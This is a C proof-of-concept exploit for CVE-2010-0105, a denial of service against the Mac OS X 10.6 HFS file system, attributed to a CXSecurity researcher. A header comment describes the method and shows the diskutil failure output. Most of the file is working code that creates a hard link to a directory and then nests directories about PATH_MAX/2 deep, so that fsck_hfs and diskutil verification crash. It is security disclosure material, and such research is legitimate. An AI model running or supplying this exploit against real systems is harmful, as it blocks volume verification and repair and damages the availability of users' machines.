/* Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack (Denial of Service) by Maksymilian Arciemowicz from CXSecurity http://cxsecurity.com/issue/WLB-2005090063 NOTE: This DoS will be localized in phase Checking multi-linked directories So we need activate it with line connlink("C/C","CX"); Now we need create PATH_MAX/2 directory tree to make overflow. and we should get diskutil and fsck_hfs exit with sig=8 ~ x$ diskutil verifyVolume /Volumes/max2 Started filesystem verification on disk0s3 max2 Performing live verification Checking Journaled HFS Plus volume Checking extents overflow file Checking catalog file Checking multi-linked files Checking catalog hierarchy Checking extended attributes file Checking multi-linked directories Maximum nesting of folders and directory hard links reached The volume max2 could not be verified completely Error: -9957: Filesystem verify or repair failed Underlying error: 8: POSIX reports: Exec format error */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/types.h> int createdir(char *name){ if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR |S_IXUSR)){ printf("Can`t create %s", name); exit(1);} else return 0; } int comein(char *name){ if(0!=chdir(name)){ printf("Can`t chdir in to %s", name); exit(1);} else return 0; } int connlink(a,b) char *a,*b; { if(0!=link(a,b)){ printf("Can`t create link %s => %s",a,b); exit(1);} else return 0; } int main(int argc,char *argv[]){ int level; FILE *fp; if(argc==2) { level=atoi(argv[1]); }else{ level=512; //default } createdir("C"); //create hardlink createdir("C/C"); //create hardlink connlink("C/C","CX"); //we need use to checking multi-linked directorie comein("C"); while(level--) printf("Level: %i mkdir:%i chdir:%i\n",level, createdir("C"), comein("C")); printf("check diskutil verifyVolume /\n"); return 0; }